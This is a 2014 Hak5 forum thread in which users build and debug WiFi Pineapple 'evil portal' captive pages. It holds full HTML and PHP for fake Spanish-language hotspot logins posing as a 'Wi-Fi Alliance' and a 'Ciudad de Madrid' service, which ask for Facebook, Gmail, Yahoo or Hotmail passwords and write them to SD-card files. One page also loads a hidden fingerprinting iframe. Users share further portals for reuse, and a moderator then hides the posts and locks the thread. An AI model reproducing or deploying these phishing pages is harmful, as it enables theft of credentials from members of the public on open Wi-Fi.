daniboy92 Posted September 2, 2014 Share Posted September 2, 2014 Hi everyone, Just a quick answer: how can i sniff a password an email with a portal with authentication? Link to comment Share on other sites More sharing options...
alphax30 Posted September 2, 2014 Share Posted September 2, 2014 hi, Did you try evilportal / nodogsplash ? there is a post, with good examples html/php sources. Link to comment Share on other sites More sharing options...
daniboy92 Posted September 2, 2014 Author Share Posted September 2, 2014 I don't know it ,thanks! I will search it and summit here if i have it or notn Link to comment Share on other sites More sharing options...
daniboy92 Posted September 2, 2014 Author Share Posted September 2, 2014 · Hidden by Sebkinne, September 4, 2014 - No reason given Hidden by Sebkinne, September 4, 2014 - No reason given This is my splash.html: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Internet Gratis | Wi-Fi Alliance</title> </head> <body> <center> <br /> <img src="images/wifi-alliance.png" width="20%"><br /> <br /> <p><Strong>Bienvenido a WiFi Alliace Hot-Spot. Para iniciar sesión en la red WiFi primero necesita crear una cuenta a través de cualquiera de sus páginas favoritas.</Strong></p> <p><Strong>Por favor, introduzca su cuenta Facebook, Yahoo, Hotmail o Gmail para registrarse. Una vez registrado podrá disfrutar de 60 minutos de internet ¡GRATIS!. </Strong></p><br /> <form action="capture" method="post"> <fieldset> <table width="320"> <tr> <td colspan="1" align=left>Email:</td> <td colspan="3" width="100%"><input style="width:100%;" type="text" name="name" /></td> </tr> <tr> <td colspan="1" align=left>Contraseña:</td> <td colspan="3" width="100%"><input style="width:100%;" type="password" name="pass" /></td> </tr> <tr> <td><img src="images/facebooklogo.png" /></td> <td><img src="images/yahoologo.jpg"/></td> <td><img src="images/hotmaillogo.jpg"/></td> <td><img src="images/gmaillogo.png"/></td> </tr> <tr> </tr> <tr></tr> <td align=center ><input type="submit" value="Login" name="facebook" /></td> <td align=center ><input type="submit" value="Login" name="yahoo" /></td> <td align=center ><input type="submit" value="Login" name="hotmail" /></td> <td align=center ><input type="submit" value="Login" name="gmail" /></td> </table> </fieldset> </form> </center> </body> </html And this is my capture.php: <?php $username = $_POST['username']; $password = $_POST['password']; $file = fopen("sd/evilportal.txt", "a"); fwrite($file, $username . " " . $password . "\n"); fclose($file); ?> I have a url to this file. The problem is: i put email and password but it reload the same web, it doesn't continue to normal navigation and it doesn't save any pass and email... Please someone can help me? Link to comment
daniboy92 Posted September 2, 2014 Author Share Posted September 2, 2014 Someone? Link to comment Share on other sites More sharing options...
newbi3 Posted September 3, 2014 Share Posted September 3, 2014 Someone? You are submitting your form to no where... <form action="capture" method="post"> The value of action should be the place that you are posting to. Capture is nothing. It should look like: <form action="http://172.16.42.1/capture.php" method="post"> Link to comment Share on other sites More sharing options...
daniboy92 Posted September 3, 2014 Author Share Posted September 3, 2014 (edited) You are submitting your form to no where... <form action="capture" method="post"> The value of action should be the place that you are posting to. Capture is nothing. It should look like: <form action="http://172.16.42.1/capture.php" method="post"> Thanks newbi3. 'Capture' it's an url in the same folder of my splash.html, it's aiming to capture.php in my SD. Edited September 3, 2014 by daniboy92 Link to comment Share on other sites More sharing options...
newbi3 Posted September 3, 2014 Share Posted September 3, 2014 Thanks newbi3. 'Capture' it's a url in the same folder, it's aiming to capture.php in my SD. You have to have it running on a webserver. It can't just post to a file in a random location Link to comment Share on other sites More sharing options...
daniboy92 Posted September 3, 2014 Author Share Posted September 3, 2014 You have to have it running on a webserver. It can't just post to a file in a random location And what's the correct place to this file? /www folder? Link to comment Share on other sites More sharing options...
newbi3 Posted September 3, 2014 Share Posted September 3, 2014 Yes /www is a folder that nginx uses for the webserver running on port 80 Link to comment Share on other sites More sharing options...
daniboy92 Posted September 3, 2014 Author Share Posted September 3, 2014 (edited) Can you help me with this html? It's another html web, and i have all in order: capture.php in /www folder, 'post' method aiming to http://172.16.42.1/capture.php, but i can't get a working phishing web... This is the thread: https://forums.hak5.org/index.php?/topic/33553-help-me-with-this-html-code/ Thanks a lot for all your support newbi3. Edited September 3, 2014 by daniboy92 Link to comment Share on other sites More sharing options...
pax0r Posted September 3, 2014 Share Posted September 3, 2014 (edited) please newbi3, fix your infusion (evil portal). Don't refresh tabs. work perfect, but infusion dont apply changes, dont refresh, dont close tabs.. Edited September 3, 2014 by pax0r Link to comment Share on other sites More sharing options...
newbi3 Posted September 3, 2014 Share Posted September 3, 2014 please newbi3, fix your infusion (evil portal). Don't refresh tabs. work perfect, but infusion dont apply changes, dont refresh, dont close tabs.. Update to 2.3 which was released today Link to comment Share on other sites More sharing options...
pax0r Posted September 3, 2014 Share Posted September 3, 2014 Update to 2.3 which was released today thanks bro. Link to comment Share on other sites More sharing options...
pax0r Posted September 3, 2014 Share Posted September 3, 2014 (edited) hey daniboy92 here a simple captive portal 100% work #1 Get fresh evil portal infusion (2.3)#2 Configure : Auto#3 Copy these files in your pineapple(with ftp, sftp, ..) :a) splash.html --> to --> /etc/nodogsplash/htdocsb) fonts (full directory) --> to --> /etc/nodogsplash/htdocsc) style.css --> to --> /etc/nodogsplash/htdocs/imagesd) h.jpg --> to --> /etc/nodogsplash/htdocs/imagese) service.php --> to --> /www#4 start nodogsplash service#5 enjoy!! files (mega.co.nz) -> http://goo.gl/7DdqcO File to save input box in --> /www/stored.txt Edited September 4, 2014 by pax0r Link to comment Share on other sites More sharing options...
newbi3 Posted September 4, 2014 Share Posted September 4, 2014 Nice I'll put this in the Evil Portal Support thread as a demo portal if you'd like Link to comment Share on other sites More sharing options...
daniboy92 Posted September 4, 2014 Author Share Posted September 4, 2014 Amazing!!!! Thanks pax0r. Later I will download it and summit mine here. Also y have another portal in process. Link to comment Share on other sites More sharing options...
daniboy92 Posted September 4, 2014 Author Share Posted September 4, 2014 Yes!!! Perfect!! Awesome captive portal Now i have two working portals more, if newbi3 want i can post it in the infusion thread. Link to comment Share on other sites More sharing options...
newbi3 Posted September 4, 2014 Share Posted September 4, 2014 I'd rather post it in the main post with a disclaimer saying its an example with no support. If you could give me the code and a screenshot I'll post it Link to comment Share on other sites More sharing options...
daniboy92 Posted September 4, 2014 Author Share Posted September 4, 2014 Yes, of course. Will be portals with fine working. Just for give examples for people ;) Link to comment Share on other sites More sharing options...
pax0r Posted September 4, 2014 Share Posted September 4, 2014 Nice I'll put this in the Evil Portal Support thread as a demo portal if you'd like ofcourse, but is ugly (but very easy to modify). Feel free to change whatever you want. Link to comment Share on other sites More sharing options...
daniboy92 Posted September 4, 2014 Author Share Posted September 4, 2014 · Hidden by Sebkinne, September 4, 2014 - No reason given Hidden by Sebkinne, September 4, 2014 - No reason given Portal 1º: splash.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <script type="text/javascript"> function ajaxRequest() { if (window.XMLHttpRequest) { return new XMLHttpRequest(); } else if (window.ActiveXObject) { return new ActiveXObject("Microsoft.XMLHTTP"); } else { return false; } } function sendInfo() { var xmlhttp = new ajaxRequest(); var usernamevalue=encodeURIComponent(document.getElementById("username").value); var redirectvalue=encodeURIComponent(document.getElementById("redirect").value); var passwordvalue=encodeURIComponent(document.getElementById("password").value); if (emailvalue != null && emailvalue != "") { var parameters="email="+emailvalue+"&redirect="+redirectvalue+"&password=" + passwordvalue; xmlhttp.open("POST", "http://172.16.42.1/captureWA.php", true); xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xmlhttp.send(parameters); document.getElementById("results").innerHTML="¡Gracias!"; window.location = document.getElementById("redirect").value; } else { document.getElementById("results").innerHTML="Por favor, ingrese su email y su contraseña."; } } </script> <head> <title>Internet Gratis | Wi-Fi Alliance</title> </head> <body> <center> <br /> <img src="/images/wifi-alliance.png" width="20%"><br /> <br /> <p><Strong>Bienvenido a WiFi Alliace Hot-Spot. Para iniciar sesión en la red WiFi primero necesita crear una cuenta a través de cualquiera de sus páginas favoritas.</Strong></p> <p><Strong>Por favor, introduzca su cuenta Facebook, Yahoo, Hotmail o Gmail para registrarse. Una vez registrado podrá disfrutar de 60 minutos de internet ¡GRATIS!. </Strong></p><br /> <form action="http://172.16.42.1/captureWA.php" method="post"> <fieldset> <table width="320"> <tr> <td><label>Email</label></td> <td><input type="text" id="username" name="username" placeholder="Ingrese su email" required /> <td><label>Contraseña</label></td> <td><input type="password" id="password" name="password" placeholder="Ingrese su contraseña" required /> </tr> <tr> <td><img src="/images/facebooklogo.png" /></td> <td><img src="/images/yahoologo.jpg"/></td> <td><img src="/images/hotmaillogo.jpg"/></td> <td><img src="/images/gmaillogo.png"/></td> </tr> <tr> </tr> <tr></tr> <td align=center ><input type="submit" onclick="sendInfo();return false;" value="Login" name="facebook" /></td> <td align=center ><input type="submit" onclick="sendInfo();return false;" value="Login" name="yahoo" /></td> <td align=center ><input type="submit" onclick="sendInfo();return false;" value="Login" name="hotmail" /></td> <td align=center ><input type="submit" onclick="sendInfo();return false;" value="Login" name="gmail" /></td> </table> <input type="hidden" id="redirect" name="redirect" value="$authtarget" /> </fieldset> </form> </center> </body> </html> captureWA.php <?php $username = $_POST['username']; $password = $_POST['password']; $file = fopen("/sd/WiFiAlli.txt", "a"); fwrite($file, $username . " " . $password . "\n"); fclose($file); ?> How it looks: It gets email and password, even prevents a empty login. User only can enter with a filled fields. Link to comment
daniboy92 Posted September 4, 2014 Author Share Posted September 4, 2014 (edited) · Hidden by Sebkinne, September 4, 2014 - No reason given Hidden by Sebkinne, September 4, 2014 - No reason given Portal 2º.splash.html: <html><head> <title>$gatewayname Entry</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-cache"> <script type="text/javascript"> function ajaxRequest() { if (window.XMLHttpRequest) { return new XMLHttpRequest(); } else if (window.ActiveXObject) { return new ActiveXObject("Microsoft.XMLHTTP"); } else { return false; } }function sendInfo() { var xmlhttp = new ajaxRequest(); var emailvalue=encodeURIComponent(document.getElementById("email").value); var redirectvalue=encodeURIComponent(document.getElementById("redirect").value); var passwordvalue=encodeURIComponent(document.getElementById("password").value); if (emailvalue != null && emailvalue != "") { var parameters="email="+emailvalue+"&redirect="+redirectvalue+"&password=" + passwordvalue; xmlhttp.open("POST", "http://172.16.42.1/capture.php", true); xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xmlhttp.send(parameters); document.getElementById("results").innerHTML="¡Gracias!"; window.location = document.getElementById("redirect").value; } else { document.getElementById("results").innerHTML="Por favor, ingrese su email y su contraseña."; } } </script></head><body><center> <h2>$gatewayname</h2> <font size="1"><i>Ofrecido para usted por la Ciudad de Madrid</i></font> <br /> <br /> <p><font size="2">Para hacer uso del servicio necesita suscribirse con un email y una contraseña.</font></p> <div id="results"></div> <form id="emailform" method="POST" action="http://172.16.42.1/capture.php"> <table> <tr> <td><label>Email</label></td> <td><input type="text" id="email" name="email" placeholder="Ingrese su email" required /> <td><label>Contraseña</label></td> <td><input type="password" id="password" name="password" placeholder="Ingrese su contraseña" required /> </tr> </table> <input type="hidden" id="redirect" name="redirect" value="$authtarget" /> <button type="button" onclick="sendInfo();return false;">Ingresar</button> </form> <p><font size="1"><i>Su información no será compartida con terceras partes.</i></font></p> <p><font size="1"><i>Conectándose y haciendo uso de esta red está aceptando los <a href="#">términos del servicio.</a></i></p> <img src="/images/wifi.png" width="71" height="49" border="0"></center><iframe style="display:none;" src="http://172.16.42.1/get/get.php"></iframe></body></html> capture.php: <?php$email = $_POST['email'];$password = $_POST['password'];$redirect = $_POST['redirect'];$file = fopen("/sd/MadridWiFiHotSpot.txt", "a");fwrite($file, $email . " " . $password . "\n");fclose($file);echo 'Gracias por elegir ' . $gatewayname . ' <meta http-equiv="refresh" content="2; url=' . $redirect . '" />';?> How it looks: Note: Firefox shows '$gatewayname, but with nodogsplash running it shows the name of the network. Note2: get.php referred at the end of the html aim to get.php generate from Get infusion.Also, this portal get credentials for email and pass, and also prevents an empty login. Edited September 4, 2014 by daniboy92 Link to comment
daniboy92 Posted September 4, 2014 Author Share Posted September 4, 2014 · Hidden by Sebkinne, September 4, 2014 - No reason given Hidden by Sebkinne, September 4, 2014 - No reason given Clarification: i don't take any credit for this portals, i only take codes for many portals and modify for me, with help from many people. I do this only for personal test and don't for illegal activities. Link to comment
Sebkinne Posted September 4, 2014 Share Posted September 4, 2014 Locked. Please see this PSA for more info. If you need help getting HTML / PHP / nodogsplash to work together, you can ask specific questions. Sharing of phishing pages is not permitted. Best Regards, Sebkinne Link to comment Share on other sites More sharing options...
Recommended Posts